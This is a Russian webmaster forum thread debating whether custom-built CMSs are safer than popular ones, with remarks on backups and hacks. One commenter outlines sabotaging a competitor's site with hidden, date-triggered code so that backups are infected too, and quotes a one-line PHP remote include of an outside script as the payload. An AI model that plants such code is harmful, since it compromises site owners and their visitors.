- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
В 2023 году Google заблокировал более 170 млн фальшивых отзывов на Картах
Это на 45% больше, чем в 2022 году
Оксана Мамчуева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
ууу.... не ожидал...
Берите нормальную CMS, с нормальным "производственным процессом" — армией тестеров, билдеров, распределением мажорных-минорных версий и т.д.
По аналогии, ОС. К примеру, FreeBSD. Открытый код, тудым-сюдым. Много дыр?
Весь тред опять не осиляю, может повторю сказанное.
Самопис за счёт уникальности как раз и неуязвим. Да что далеко ходить, в логах сервера запрсы вида "wp-admin", да, это плата за популярность.
Берите нормальную CMS, с нормальным "производственным процессом" — армией тестеров, билдеров, распределением мажорных-минорных версий и т.д.
Вопрос - зачем? ("за тумбочкой" ответ уже известен и аналоги тоже...)
...Самопис за счёт уникальности как раз и неуязвим....
Вот в том то и дело, гораздо приятней когда понимаешь абсолютно всю структуру построения алгоритма сайта, а не то что "...админка тут, тут создам новую страничку"....
magistrat, за тем, чтобы самому заняться чем-то другим.
Иной вопрос, если вам написание своих CMS доставляет удовольствие, тогда, может, ну его, сайтостроение? Доведите до продакшена, сделайте красивую презентацию и потесните наших Юми с Дле.
magistrat, за тем, чтобы самому заняться чем-то другим.
Уверяю Вас, я как раз и занимаюсь "чем то другим" причем сайт, компании где я работаю, которая "занимается чем-то другим" весьма уязвим (убедился когда получил "фул доступ к иxней админке и BD, причем к IT технологиям компании, я не имею никакого отношения)
Вопрос - зачем? ("за тумбочкой" ответ уже известен и аналоги тоже...)
Вот в том то и дело, гораздо приятней когда понимаешь абсолютно всю структуру построения алгоритма сайта, а не то что "...админка тут, тут создам новую страничку"....
Тоже думали раньше, что пропись круче. Ну или частичная пропись, но своя.
Сейчас немного иначе:
1) разница по натягиванию на CMS среднесложных кодов и написание модулей это тыщ 15-25... ну это фигня, если у сайта большое будущее.
2) бонус автоматически генерящихся урл транслитом - пустячок, но приятно. Куча готовых модулей всяких фото-галерей встраиваемых и т.п это уже двойне приятно.
3) бонус доступа юзеров-владельцев-менеджеров. А таких сейчас все больше и больше, продвинутых молодых. Это не 10 лет назад. Пусть блин контент плодят аффтарский - такому же цены нет.
4) следствие пунтка 3 - контору сеошников меньше дергают, если справляются "по ерунде" самостоятельно.
5)взломы: вы доступ фтп даете владельцу сайта(ну или еще кому-нибудь?) тогда вы типа должны ему и антивирь ставить, чтобы с диска не стянули... короче надо думать как и где он его будет хранить, иначе при большом числе сайтов и лет эксперимента :) все равно хакнуть кого-нибудь. Плюс частенько хакают самих хостеров. А еще есть кейсы, когда хостер может просто сдохнуть.. года два назад помню был случай, почти обанкротился один жирный хостер, ему просто доступ перерубили извне к винтам... ну и подвисло все на пару месяцев, если бы не было бэкапов... считай тот же взлом. Макхост вроде, или как там его звали?
и ответ на вопрос в посте, вопрос уязвимостей и вреда от них (последнее ключевое):
имхо, все что делают с сайтами злое видно, причем быстро видно. Т.е. задача только - быстро это все исправить. Ну а тут нужны бэкапы автоматические и частые.
Когда проекты крутые и очень-очень нужные - бэкапы делаются раз в день, и хоть обхакайся. Для среднего коммерческого сайта, за которым следят достаточно раз в неделю.
Ну а на совсем жирных проектах со своими фишками и мега-наворотами просто разницы нет - юзать CMS общую(писать под нее модули), или строчить самому с нуля, ведь дорабатывать придется ежемесячно и то и то. Свое по идее в этом случае быстрее, хотя сейчас только медиа-контента пошло, что именно он валит серваки а не кривость кодов.
В самописной СMS дыр будет куда больше
Зато у злоумышленников нет исходного кода. Без него дырки сложнее искать...
...
В общем все предельно ясно разъяснено! СПС.
Хотя не совсем согласен со следующим...
...автоматически генерящихся урл транслитом...
в принципе я написал тот-же "автоген" ЧПУшный УРЛ причем не на транслитерале, а сразу на кириллице , подстраиваясь ими под поисковые запросы как результат - очень существенный подъем в выдаче
...бэкапы делаются раз в день, и хоть обхакайся...
Ну тут наверно дело не в частоте создания бекапов, а в сроках их хранения. Я бы, к примеру, если и решил топить конкурентный сайт, то залил бы туда свой (очень хорошо "заныканый") код, который будет выполнятся ну скажем только если текущий год 2013... В итоге имеем что все бекапы заражены (а учитывая что вредоносный скрипт может состоять всего из одной строчки плана -- include ("http://site/strahniy-script.php"); -- то и поиск его будет весьма сложным...
У кого ещё есть свои CMS? Я сегодня добрый
Спесь сбрось, добрый. Находишь что-то толковое - получаешь 500$, не находишь - должен 200$. Идет?
Предполагаю что некоторые ответят мол "..зависит от ситуации и необходимости.." но интересует в общем, сделать упор на CMS системы или все-же продолжить разработку программного каркаса с нуля?!
Исходите из того, что заказчикам в большинстве случаев не важна техническая часть, т.е. на какой системе будет стоять сайт.
Спесь сбрось, добрый. Находишь что-то толковое - получаешь 500$, не находишь - должен 200$. Идет?
Долго думали, чтобы глупость такую сморозить?